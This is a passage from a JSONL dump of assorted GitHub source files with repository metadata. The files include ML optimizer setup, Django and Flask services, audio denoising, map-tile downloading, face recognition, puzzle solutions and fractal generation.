cfg_optimizers[\"SGD\"]:\n opt = tf.keras.optimizers.SGD(**sgd_kwargs)\n optimizers.append((opt, \"SGD\", sgd_kwargs['learning_rate']))\n\n if \"Newton_CG\" in cfg_optimizers and cfg_optimizers[\"Newton_CG\"]:\n for cg_kwargs in cfg_optimizers[\"Newton_CG\"]:\n if cg_kwargs['learning_rate'] == 'ExponentialDecayCustom':\n cg_kwargs.pop('learning_rate')\n opt = es.EHNewtonOptimizer(learning_rate=ExponentialDecayCustom(0.001, 4000, 0.96), **cg_kwargs)\n optimizers.append((opt, \"Newton_CG\", 'ExponentialDecayCustom', cg_kwargs['tau']))\n else:\n opt = es.EHNewtonOptimizer(**cg_kwargs)\n optimizers.append((opt, \"Newton_CG\", cg_kwargs['learning_rate'], cg_kwargs['tau']))\n\n print(\"-\" * 30, \"Optimizers Information\", \"-\" * 30)\n for optimizer in optimizers:\n if optimizer[1] == \"Newton_CG\":\n _, name, lr, tau = optimizer\n print(f'opt= {name}, lr={lr}, tau={tau}')\n else:\n _, name, lr = optimizer\n print(f'opt= {name}, lr={lr}')\n return optimizers\n","repo_name":"severin617/nlp-newton-cg","sub_path":"utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":2955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8827553744","text":"from api.applications.models import Application\nfrom api.funds.models import Fund\nfrom api.workflows.models import WorkFlow\n\n\nclass AllEligibilityDecisionTaken:\n def __init__(self, fund: Fund):\n self.fund = fund\n\n def process(self):\n applications = 
Application.objects.filter(fund=self.fund)\n for application in applications:\n if application.status not in [Application.Status.CREATED, Application.Status.SUBMITTED]:\n continue\n\n parent_workflow = application.workflow\n\n # If no parent workflow, this application has not been started,\n # so it can not be true that eligibility has been completed.\n if parent_workflow is None:\n return False\n\n if application.eligibility_response and application.eligibility_response.is_approved:\n continue\n\n eligibility_workflow = parent_workflow.child_workflows.filter(\n module=WorkFlow.WorkFlowModuleChoices.ELIGIBILITY.value\n ).last()\n is_eligibility_approved = eligibility_workflow and eligibility_workflow.is_completed\n if not is_eligibility_approved:\n return False\n\n return True\n","repo_name":"tayyabsaleem7756/jobtest","sub_path":"backend/retail_market/api/funds/services/all_eligibility_decision_taken.py","file_name":"all_eligibility_decision_taken.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28352679396","text":"from gevent import monkey\nmonkey.patch_all(thread=False)\n\nimport argparse\nfrom flask import Flask\nfrom maat import MaatAgent, create_agent_api\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Maât-Agent\")\n parser.add_argument(\n \"--process_name\", default=\"rsession\", type=str,\n help=\"The name of the process to watch\"\n )\n parser.add_argument(\"-s\", \"--sleep_time\", default=5.0, type=float, help=\"Interval between each refresh of data\")\n parser.add_argument(\n \"--process_interval\", default=2.5, type=float,\n help=\"Time between refresh process\"\n )\n parser.add_argument(\"-o\", \"--host\", default=\"0.0.0.0\", type=str, help=\"Host to listen to\")\n parser.add_argument(\"-p\", \"--port\", default=5000, type=int, help=\"Port to listen to\")\n\n args = parser.parse_args()\n\n maat_agent = MaatAgent(\n args.process_name, sleep_time=args.sleep_time, process_interval=args.process_interval\n )\n\n app = Flask(\"Maat-Agent\")\n\n create_agent_api(args.host, args.port, maat_agent, app)","repo_name":"Valdimus/Maat","sub_path":"test_agent.py","file_name":"test_agent.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27600899604","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# @Author : mofei\n# @Time : 2020/3/11 19:25\n# @File : p03_parse_simple_xml_data.py\n# @Software: PyCharm\n\n\"\"\"解析简单的XML数据\"\"\"\n\nfrom urllib.request import urlopen\nfrom xml.etree.ElementTree import parse\n\n# 使用 xml.etree.ElementTree 模块从简单的XML文档中提取数据\nu = urlopen('http://planet.python.org/rss20.xml')\ndoc = parse(u)\n\nfor item in doc.iterfind('channel/item'):\n title = item.findtext('title')\n date = item.findtext('pubDate')\n link = item.findtext('link')\n\n print(title)\n print(date)\n print(link)\n print()\n","repo_name":"mofei952/cookbook","sub_path":"c06_data_encoding_and_process/p03_parse_simple_xml_data.py","file_name":"p03_parse_simple_xml_data.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21830623653","text":"from __future__ import division\nimport numpy as np\nfrom scipy.io.wavfile import read, write\nfrom .logmmse import logmmse as _logmmse\nfrom .utils import to_float, from_float\n\nnp.seterr('raise')\n\ndef 
mono_logmmse(m_input, fs, dtype, initial_noise=6, window_size=0, noise_threshold=0.15):\n num_frames = len(m_input)\n chunk_size = int(np.floor(60*fs))\n m_output = np.array([], dtype=dtype)\n saved_params = None\n frames_read = 0\n while frames_read < num_frames:\n frames = num_frames - frames_read if frames_read + chunk_size > num_frames else chunk_size\n signal = m_input[frames_read:frames_read + frames]\n frames_read = frames_read + frames\n _output, saved_params = _logmmse(signal, fs, initial_noise, window_size, noise_threshold, saved_params)\n m_output = np.concatenate((m_output, from_float(_output, dtype)))\n return m_output\n\ndef logmmse(data, sampling_rate, output_file=None, initial_noise=6,\n window_size=0, noise_threshold=0.15):\n data, dtype = to_float(data)\n data += np.finfo(np.float64).eps\n if data.ndim == 1:\n output = mono_logmmse(data, sampling_rate, dtype, initial_noise, window_size,\n noise_threshold)\n else:\n output = []\n for _, m_input in enumerate(data.T):\n output.append(mono_logmmse(m_input, sampling_rate, dtype, initial_noise,\n window_size, noise_threshold))\n output = np.array(output)\n if output_file is not None:\n write(output_file, sampling_rate, output.T)\n return output.T\n\ndef logmmse_from_file(input_file, output_file=None, initial_noise=6,\n window_size=0, noise_threshold=0.15):\n sampling_rate, data = read(input_file, 'r')\n return logmmse(data, sampling_rate, output_file, initial_noise,\n window_size, noise_threshold)\n","repo_name":"rajivpoddar/logmmse","sub_path":"logmmse/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"53"} +{"seq_id":"25471100174","text":"from roco.library.driver import Driver\nfrom roco.derived.composables.target.arduino_target import Arduino\nfrom roco.derived.composables.electrical_composable import ElectricalComposable\nfrom roco.derived.ports.electrical_port import ElectricalPort\nfrom roco.derived.ports.analog_port import AnalogOutputPort, AnalogInputPort\nfrom roco.derived.ports.int_port import OutIntPort\n\nclass PotDriver(Driver):\n\n def __init__(self, yaml_file=None, **kwargs):\n Driver.__init__(self, yaml_file, **kwargs)\n\n def define(self, **kwargs):\n Driver.define(self, **kwargs)\n\n self.physical = {\n \"numPins\": 3,\n \"power\": {\n \"Vin\": [0],\n \"Ground\": [2]\n },\n \"aliases\": [\"first pin\", \"center pin\", \"last pin\"],\n }\n\n self.pmap = [None, \"pin\", None]\n\n self.add_parameter(\"pin\", \"\", is_symbol=False)\n\n self.meta = {\n Arduino: {\n \"code\": \"\",\n\n \"inputs\": {\n },\n\n \"outputs\": {\n \"analog@@name@@\": \"analogRead(<>)\"\n },\n\n \"declarations\": \"\",\n \"setup\": \"\",\n \"needs\": set()\n }\n }\n self.add_interface(\"vIn\", AnalogInputPort(self, [1], virtual=True))\n self.add_interface(\"aOut\", AnalogOutputPort(self, [1], virtual=True))\n self.add_interface(\"outInt\", OutIntPort(self, \"outInt\", \"analog@@name@@\"))\n\nif __name__ == '__main__':\n a = PotDriver(name=\"pot_driver1\")\n a.make_output()\n","repo_name":"uclalemur/roco","sub_path":"roco/library/pot_driver.py","file_name":"pot_driver.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30555087201","text":"import inspect\nimport logging\nimport warnings\n\nfrom concurrency.exceptions import RecordModifiedError\n\nlogger = logging.getLogger(__name__)\n\n\ndef deprecated(replacement=None, 
version=None):\n    \"\"\"A decorator which can be used to mark functions as deprecated.\n    replacement is a callable that will be called with the same args\n    as the decorated function.\n    >>> import pytest\n    >>> @deprecated()\n    ... def foo1(x):\n    ...     return x\n    ...\n    >>> pytest.warns(DeprecationWarning, foo1, 1)\n    1\n    >>> def newfun(x):\n    ...     return 0\n    ...\n    >>> @deprecated(newfun, '1.1')\n    ... def foo2(x):\n    ...     return x\n    ...\n    >>> pytest.warns(DeprecationWarning, foo2, 1)\n    0\n    >>>\n    \"\"\"\n\n    def outer(oldfun):\n        def inner(*args, **kwargs):\n            msg = \"%s is deprecated\" % oldfun.__name__\n            if version is not None:\n                msg += \", will be removed in version %s\" % version\n            if replacement is not None:\n                msg += \"; use %s instead\" % (replacement)\n            warnings.warn(msg, DeprecationWarning, stacklevel=2)\n            if callable(replacement):\n                return replacement(*args, **kwargs)\n            else:\n                return oldfun(*args, **kwargs)\n\n        return inner\n\n    return outer\n\n\nclass ConcurrencyTestMixin:\n    \"\"\"\n    Mixin class to test Models that use `VersionField`\n\n    this class offers a simple test scenario. Its purpose is to discover\n    some conflict in the `save()` inheritance::\n\n        from concurrency.utils import ConcurrencyTestMixin\n        from myproject.models import MyModel\n\n        class MyModelTest(ConcurrencyTestMixin, TestCase):\n            concurrency_model = TestModel0\n            concurrency_kwargs = {'username': 'test'}\n\n    \"\"\"\n\n    concurrency_model = None\n    concurrency_kwargs = {}\n\n    def _get_concurrency_target(self, **kwargs):\n        # WARNING: this method must be idempotent, i.e. it must always\n        # return a fresh copy of the record\n        args = dict(self.concurrency_kwargs)\n        args.update(kwargs)\n        return self.concurrency_model.objects.get_or_create(**args)[0]\n\n    def test_concurrency_conflict(self):\n        import concurrency.api as api\n\n        target = self._get_concurrency_target()\n        target_copy = self._get_concurrency_target()\n        v1 = api.get_revision_of_object(target)\n        v2 = api.get_revision_of_object(target_copy)\n        assert v1 == v2, \"got same row with different version (%s/%s)\" % (v1, v2)\n        target.save()\n        assert target.pk is not None  # sanity check\n        self.assertRaises(RecordModifiedError, target_copy.save)\n\n    def test_concurrency_safety(self):\n        import concurrency.api as api\n\n        target = self.concurrency_model()\n        version = api.get_revision_of_object(target)\n        self.assertFalse(bool(version), \"version is not null %s\" % version)\n\n    def test_concurrency_management(self):\n        target = self.concurrency_model\n        self.assertTrue(hasattr(target, '_concurrencymeta'),\n                        \"%s is not under concurrency management\" % self.concurrency_model)\n\n        revision_field = target._concurrencymeta.field\n\n        self.assertTrue(revision_field in target._meta.fields,\n                        \"%s: version field not in meta.fields\" % self.concurrency_model)\n\n\nclass ConcurrencyAdminTestMixin:\n    pass\n\n\ndef refetch(model_instance):\n    \"\"\"\n    Reload model instance from the database\n    \"\"\"\n    return model_instance.__class__.objects.get(pk=model_instance.pk)\n\n\ndef get_classname(o):\n    \"\"\" Returns the classname of an object or a class\n\n    :param o:\n    :return:\n    \"\"\"\n    if inspect.isclass(o):\n        target = o\n    elif callable(o):\n        target = o\n    else:\n        target = o.__class__\n    try:\n        return target.__qualname__\n    except AttributeError:  # pragma: no cover\n        return target.__name__\n\n\ndef fqn(o):\n    \"\"\"Returns the fully qualified class name of an object or a class\n\n    :param o: object or class\n    :return: class name\n\n    >>> import concurrency.fields\n    >>> fqn('str')\n    Traceback (most recent call last):\n    ...\n    
ValueError: Invalid argument `str`\n >>> class A:\n ... def method(self):\n ... pass\n >>> str(fqn(A))\n 'concurrency.utils.A'\n\n >>> str(fqn(A()))\n 'concurrency.utils.A'\n\n >>> str(fqn(concurrency.fields))\n 'concurrency.fields'\n\n >>> str(fqn(A.method))\n 'concurrency.utils.A.method'\n\n\n \"\"\"\n parts = []\n\n # if inspect.ismethod(o):\n # try:\n # cls = o.im_class\n # except AttributeError:\n # # Python 3 eliminates im_class, substitutes __module__ and\n # # __qualname__ to provide similar information.\n # parts = (o.__module__, o.__qualname__)\n # else:\n # parts = (fqn(cls), get_classname(o))\n if hasattr(o, '__module__'):\n parts.append(o.__module__)\n parts.append(get_classname(o))\n elif inspect.ismodule(o):\n return o.__name__\n if not parts:\n raise ValueError(\"Invalid argument `%s`\" % o)\n return \".\".join(parts)\n\n\ndef flatten(iterable):\n \"\"\"\n flatten(sequence) -> list\n\n Returns a single, flat list which contains all elements retrieved\n from the sequence and all recursively contained sub-sequences\n (iterables).\n\n :param sequence: any object that implements iterable protocol (see: :ref:`typeiter`)\n :return: list\n\n Examples:\n\n >>> from adminactions.utils import flatten\n >>> [1, 2, [3,4], (5,6)]\n [1, 2, [3, 4], (5, 6)]\n\n >>> flatten([[[1,2,3], (42,None)], [4,5], [6], 7, (8,9,10)])\n [1, 2, 3, 42, None, 4, 5, 6, 7, 8, 9, 10]\"\"\"\n\n result = list()\n for el in iterable:\n if hasattr(el, \"__iter__\") and not isinstance(el, str):\n result.extend(flatten(el))\n else:\n result.append(el)\n return list(result)\n","repo_name":"saxix/django-concurrency","sub_path":"src/concurrency/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5901,"program_lang":"python","lang":"en","doc_type":"code","stars":416,"dataset":"github-code","pt":"53"} +{"seq_id":"72279982248","text":"inFile = open(\"input.txt\")\r\n\r\ncrc = 0\r\n\r\nfor l in inFile.readlines():\r\n inList = l.split('\\t')\r\n inList[-1] = inList[-1].rsplit('\\n')[0]\r\n inList = [ int(x) for x in inList]\r\n\r\n for i in range(0, len(inList)):\r\n for j in range(0,len(inList)):\r\n if j != i:\r\n if inList[j] % inList[i] == 0:\r\n crc += inList[j] / inList[i]\r\n\r\nprint(crc)","repo_name":"Flourish3/AdventOfCode","sub_path":"2017/AOC/day2/day2_2.py","file_name":"day2_2.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38547225145","text":"\"\"\"\nWe assume that every step preserves continuity,\nthat is all stepmatrices in a row has same height.\nand all stepmatrices in a column have the same width.\n\nWe assume that there are no cases when the same colors\nexpand to different matrices.\n\nThe color None expands to the smallest possible None matrix.\n\"\"\"\n\nfrom numpy import array, zeros\n\nclass StepMatrix:\n \"\"\"A fractal structure that knows its matrix at every step.\n \n The StepMatrix is constructed from a 2D integer numpy array,\n and uses the internal __color__ table at each step to\n construct the next one. 
Zero always expands to itself.\n \"\"\"\n \n colors = {}\n\n @classmethod\n def add_color(cls, stepmatrix):\n \"\"\"Adds a color to the expansion and return its index.\n \"\"\"\n if cls.colors:\n i = max(cls.colors.keys())\n else:\n i = 0\n cls.colors[i+1] = stepmatrix\n return i+1\n \n def __init__(self, matrix):\n self.depths = [ array(matrix, dtype=\"u1\") ] \n self.__array_interface__ = self.depths[0].__array_interface__\n self.clset = {cell for row in self.depths[0] for cell in row}\n\n def at_depth(self, n):\n \"\"\"Returns the matrix after `n` substitutions.\n \n The result is cached.\n \"\"\"\n if len(self.depths) <= n:\n self.depths.extend([None]*(n-len(self.depths)+1))\n if self.depths[n] is None:\n self.depths[n] = self.expand(n)\n return self.depths[n]\n \n def expand(self, n):\n \"\"\"Calculates the matrix after `n` substitutions.\n \"\"\"\n \n submatrices = {k:self.colors[k].at_depth(n-1) for k in self.clset if k!=0}\n \n basis = self.at_depth(0)\n \n H, W = basis.shape\n \n widths = [None]*W\n heights = [None]*H\n \n for x, row in enumerate(basis):\n for y, cell in enumerate(row):\n if cell == 0: # Zero is not expanded\n continue\n \n hh, ww = submatrices[cell].shape\n \n if widths[y] is None:\n widths[y] = ww\n elif widths[y] != ww:\n raise ValueError(\"Cell {}@({},{}) expands to W={},\"\n \" but a previous cell expanded to W={}\"\n .format(cell, x, y, ww, widths[y]))\n \n if heights[x] is None:\n heights[x] = hh\n elif heights[x] != hh:\n raise ValueError(\"Cell {}@({},{}) expands to H={}, \"\n \"but a previous cell expanded to H={}\"\n .format(cell, x, y, hh, heights[x]))\n \n if None in widths:\n raise ValueError(\"None encountered in column widths : {}\".format(widths))\n if None in heights:\n raise ValueError(\"None encountered in row heights : {}\".format(heights))\n \n # New empty matrix\n matrix = zeros((sum(heights), sum(widths)), dtype=\"u1\")\n \n i, j = 0, 0\n for x, row in enumerate(basis):\n hh = heights[x]\n for y, cell in enumerate(row):\n ww = widths[y]\n if cell == 0:\n i += ww\n continue\n matrix[j:j+hh, i:i+ww] = submatrices[cell]\n i += ww\n i = 0\n j += hh\n \n return matrix\n\nclass NoneMatrix(StepMatrix):\n def __init__(self, W, H):\n self.matrix = [[None]*W for i in range(H)]\n\nif __name__ == \"__main__\":\n\n from PIL import Image, ImagePalette\n import sys\n \n if len(sys.argv) < 2:\n print(\"Please supply a filename\")\n quit()\n\n if len(sys.argv) > 2:\n n = int(sys.argv[2])\n else:\n n = 3\n\n A, B, C = 1, 2, 3\n\n # A\n StepMatrix.add_color(StepMatrix([[A, A, A],\n [A, C, A],\n [A, A, A]]))\n \n # B\n StepMatrix.add_color(StepMatrix([[A, B, A],\n [B, C, B],\n [A, B, A]]))\n \n # C\n StepMatrix.add_color(StepMatrix([[C, C, C],\n [C, B, C],\n [C, C, C]]))\n\n fractal = Image.fromarray(StepMatrix.colors[A].at_depth(n), \"P\")\n palette = ImagePalette.ImagePalette()\n palette.getcolor((0, 0, 0))\n palette.getcolor((10, 10, 10))\n palette.getcolor((0, 128, 0))\n palette.getcolor((0, 0, 200))\n fractal.putpalette(palette)\n fractal.save(sys.argv[1])\n","repo_name":"typograph/pyfractal_2d","sub_path":"fractal.py","file_name":"fractal.py","file_ext":"py","file_size_in_byte":4653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4844688631","text":"import unittest\nfrom . 
import deploy\n\n\nclass TestBatch(unittest.TestCase):\n def test_divided(self):\n a = []\n for b in deploy.batch(range(4), 2):\n a.append(b)\n self.assertListEqual(a, [[0, 1], [2, 3]])\n\n def test_individed(self):\n a = []\n for b in deploy.batch(range(4), 3):\n a.append(b)\n self.assertListEqual(a, [[0, 1, 2], [3]])\n","repo_name":"michitaro/quickdb","sub_path":"quickdb/sspcatalog/deploy_test.py","file_name":"deploy_test.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32376219935","text":"\"\"\"\nThe dominator of array A is the value that occurs in more than half of the elements of A.\nWrite a function that, given an array A consisting of N integers, returns index of any element \nof array A in which the dominator of A occurs. The function should return -1 if array A does not\nhave a dominator.\n\nFor example, given array A=[3,4,3,2,3,-1,3,3] the function may return 0, 2, 4, 6 or 7.\n\"\"\"\n\nfrom collections import Counter\ndef solution(A):\n counter = Counter(A)\n for i, val in enumerate(A):\n if counter[val] > len(A)/2:\n return i\n return -1\n\nA=[3,4,3,2,3,-1,3,3]\nprint(solution(A))\n","repo_name":"ssuzana/codility-practice","sub_path":"08-leader/Dominator.py","file_name":"Dominator.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40720882377","text":"import urllib.request\nimport os\nimport mercator\nimport itertools\n\n\nclass Lonlatbox(object):\n def __init__(self, x0, y0, x1, y1):\n self.west = x0\n self.north = y0\n self.east = x1\n self.south = y1\n def __str__(self):\n return str(self.__dict__).replace(\"{\",\"\").replace(\"}\",\"\").replace(\"\\'\",\"\")\n\n\ndef lonrange(scale: int, bbox: Lonlatbox):\n return [x for x in range(0, 2 ** scale) if bbox.west < mercator.tile_lng(scale, x+1) and mercator.tile_lng(scale, x) < bbox.east]\n\n\ndef latrange(scale: int, bbox: Lonlatbox):\n return [x for x in range(0, 2 ** scale) if bbox.north > mercator.tile_lat(scale, x+1) and mercator.tile_lat(scale,x)> bbox.south]\n\n\ndef download_scale(scale: int, path: str, bbox: Lonlatbox, printf = print ):\n printf(\"downloading scale %s to %s\" % (scale, path))\n if not os.path.exists(path):\n os.makedirs(path)\n\n r = list(itertools.product(lonrange(scale, bbox), latrange(scale, bbox)))\n lr = len(r)\n printf(\"total tiles to download: %s\" % lr)\n\n for num ,(x, y) in enumerate(r):\n if not os.path.exists(os.path.join(path, \"%s_%s.png\" % (x, y))):\n response = urllib.request.urlopen('https://c.tile.opentopomap.org/%s/%s/%s.png' % (scale, x, y))\n png = response.read()\n open(os.path.join(path, \"%s_%s.png\" % (x, y)), 'wb').write(png)\n printf(\"\\r%s/%s\" % (num,lr), end=\"\")\n printf(\"\\ndownloaded\\n\")\n\n\ndef calculate_tile_count(scale: int, bbox: Lonlatbox, print_func = print):\n r = list(itertools.product(lonrange(scale, bbox), latrange(scale, bbox)))\n print_func(\"Zoom %s: Total tiles to download: %s\" % (scale ,len(r)))\n\n\n\ng_mapbox_token = \"pk.eyJ1IjoiYXNpODEiLCJhIjoiZDg1MjUxYTM2Y2RlNmU3ZGM4NjZhZmIxMTAxNDg0OWEifQ.CptV8UPpRwKkm1MM8-t4Lw\"\n\n\n# mapbox://styles/mapbox/streets-v9\n# mapbox://styles/mapbox/outdoors-v9\n# mapbox://styles/mapbox/light-v9\n# mapbox://styles/mapbox/dark-v9\n# mapbox://styles/mapbox/satellite-v9\n# mapbox://styles/mapbox/satellite-streets-v9\n\ndef get_mapbox_tile(zoom, x, y):\n mabbox_ref = 
'http://a.tiles.mapbox.com/v4/mapbox.mapbox-streets-v7/%s/%s/%s.mvt?access_token=%s' % (\n zoom, x, y, g_mapbox_token)\n return mabbox_ref\n\n\n","repo_name":"Asi81/MapDownload","sub_path":"tileweb.py","file_name":"tileweb.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"70049178088","text":"import cv2\r\nimport mediapipe as mp\r\n\r\ncap = cv2.VideoCapture(0)\r\n\r\nmpFaceDetection = mp.solutions.face_detection\r\nmpDraw = mp.solutions.drawing_utils\r\nfaceDetection = mpFaceDetection.FaceDetection(0.5)\r\n\r\nwhile 1:\r\n success, img = cap.read()\r\n # in this it open the camera\r\n imgRGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n #change the color of the image it turns the image into blue,green and red to red green and blue\r\n results = faceDetection.process(imgRGB)\r\n\r\n if results.detections:\r\n for id, detection in enumerate(results.detections):\r\n #for loop that iterates over the list of results.detections\r\n bboxC = detection.location_data.relative_bounding_box\r\n #bboxC is a variable that is used to store the relative bounding box information for each detected face.\r\n mpDraw.draw_detection(img, detection)\r\n ih, iw, ic = img.shape\r\n bbox = int(bboxC.xmin * iw), int(bboxC.ymin * ih), \\\r\n int(bboxC.width * iw), int(bboxC.height * ih)\r\n #these are the length and width and height of the box and give the exact pixel values of the box\r\n cv2.rectangle(img, bbox, (255, 0, 255), 2)\r\n #In the above it will draw the box detected image and (255,0,255)\r\n\r\n cv2.imshow(\"Image\", img)\r\n # it is displaying the images on monitor or screen\r\n cv2.waitKey(1)\r\n #wait for a specified time\r\n\r\n\r\n\r\n\r\n","repo_name":"SACO14subrahmanyam/Face-detection-using-Mediapipe","sub_path":"face detection.py","file_name":"face detection.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16737735422","text":"import cv2\nimport numpy as np\nfrom joblib import load\nimport face_recognition\n#import imutils\n\nHAAR_MODEL = './model-haar/haarcascade_frontalface_default.xml'\n\n# INPUT/OUTPUT PARAMETERS\nSVM_MODEL = './model/cs-faces-encoding.lib'\nFACE_SIZE = (256,256)\n\nfont = cv2.FONT_HERSHEY_SIMPLEX\ncolor_known = (0,255,0)\ncolor_unknown = (0,0,255)\nthreshold = 0.80\n\ndetector = cv2.CascadeClassifier(HAAR_MODEL)\nclassifier = load(SVM_MODEL)\n\ncapture = cv2.VideoCapture(0)\n#cv2.namedWindow(\"face classifier\", cv2.WND_PROP_FULLSCREEN)\n#cv2.setWindowProperty(\"face classifier\", cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)\nwhile True:\n ret, frame = capture.read()\n image = frame.copy()\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n faces = detector.detectMultiScale(gray, 1.3, 5)\n\n for (x, y, w, h) in faces:\n testset = []\n boxes = [(y, x + w, y + h, x)]\n encodings = face_recognition.face_encodings(rgb,boxes)\n if(len(encodings) > 0):\n testset.append(np.ravel(encodings[0]))\n pred = classifier.predict(testset)\n prob = classifier.predict_proba(testset)\n max_prob = max(prob[0])\n color = color_unknown\n if max_prob >= threshold:\n text = ''.join(pred[0] + ' (' + '{0:.2g}'.format(max_prob * 100) + '%)')\n color = color_known\n cv2.putText(image, text, (x,y-10), font, 0.6, color, thickness=2)\n else:\n color = color_unknown\n text = ''.join('Unknown')\n cv2.putText(image, text, (x, y - 10), font, 0.6, color, 
thickness=2)\n\n cv2.rectangle(image, (x,y), (x+w,y+h), color, 2)\n\n image = cv2.putText(image, \"AI Face Recognition\", (10, 15), cv2.FONT_HERSHEY_SIMPLEX, 0.4,\n (0, 0, 255),\n lineType=cv2.LINE_AA)\n cv2.imshow('face classifier', image)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\ncapture.release()\ncv2.destroyAllWindows()\n","repo_name":"ksytrek/nsc_backup","sub_path":".old_history/Script/python/PCA/face-recogniser-video-pcaV2.py","file_name":"face-recogniser-video-pcaV2.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41142585678","text":"import torch.nn as nn\nimport torch\n\nclass Model(nn.Module):\n ''' nn.GRU\n '''\n def __init__(self):\n super(Model, self).__init__()\n self.gru1=nn.GRU(Co.f_in,128,batch_first=True)\n self.gru2=nn.GRU(128,128,batch_first=True)\n self.FC1=nn.Linear(128,1)\n self.FC2=nn.Linear(Co.seq_len,Co.pred_len)\n self.drop=nn.Dropout(0.2)\n\n def forward(self,X): \n out,hn = self.gru1(X)\n out,hn = self.gru2(self.drop(out))\n out = self.FC1(out).squeeze(-1) \n out = self.FC2(out).unsqueeze(-1)\n return out \n","repo_name":"hqyhello/Windpower-Prediciton","sub_path":"Models/GRU.py","file_name":"GRU.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28868120995","text":"\"\"\"\nhttps://leetcode.com/problems/roman-to-integer/\nGiven a roman numeral, convert it to an integer. Input is guaranteed to be within the range from 1 to 3999.\nInput: \"MCMXCIV\"\nOutput: 1994\n\"\"\"\n\nclass Solution:\n def romanToInt(self, s):\n cMap = {\n 'M' : 1000,\n 'D' : 500,\n 'C' : 100,\n 'L' : 50,\n 'X' : 10,\n 'V' : 5,\n 'I' : 1\n }\n\n sMap = { \n 'CM' : 900,\n 'CD' : 400,\n 'XC' : 90,\n 'XL' : 40,\n 'IX' : 9,\n 'IV' : 4\n }\n\n num = 0\n\n for rNum in sMap.keys():\n if rNum in s:\n s = s.replace(rNum, '')\n num += sMap[rNum]\n\n for rNum in cMap.keys():\n if rNum in s:\n n = s.count(rNum)\n num += n * cMap[rNum]\n s = s.replace(rNum, '')\n return num\n\n def test_romanToInt(self):\n print(self.romanToInt('LIX'))\n print(self.romanToInt('MCMXCIV'))\n","repo_name":"firoza90/leetcode","sub_path":"roman_to_integer.py","file_name":"roman_to_integer.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74526173286","text":"import taichi as ti\nimport taichi_glsl as ts\nfrom .common import *\nimport math\n\n\ndef rotationX(angle):\n return [\n [1, 0, 0],\n [0, math.cos(angle), -math.sin(angle)],\n [0, math.sin(angle), math.cos(angle)],\n ]\n\ndef rotationY(angle):\n return [\n [ math.cos(angle), 0, math.sin(angle)],\n [ 0, 1, 0],\n [-math.sin(angle), 0, math.cos(angle)],\n ]\n\ndef rotationZ(angle):\n return [\n [math.cos(angle), -math.sin(angle), 0],\n [math.sin(angle), math.cos(angle), 0],\n [ 0, 0, 1],\n ]\n\n\n@ti.data_oriented\nclass Affine(ts.TaichiClass, AutoInit):\n @property\n def matrix(self):\n return self.entries[0]\n\n @property\n def offset(self):\n return self.entries[1]\n\n @classmethod\n def _field(cls, shape=None):\n return ti.Matrix.field(3, 3, ti.f32, shape), ti.Vector.field(3, ti.f32, shape)\n\n @ti.func\n def loadIdentity(self):\n self.matrix = [[1, 0, 0], [0, 1, 0], [0, 0, 1]]\n self.offset = [0, 0, 0]\n\n @ti.kernel\n def _init(self):\n self.loadIdentity()\n\n @ti.func\n def __matmul__(self, other):\n return self.matrix @ other + self.offset\n\n 
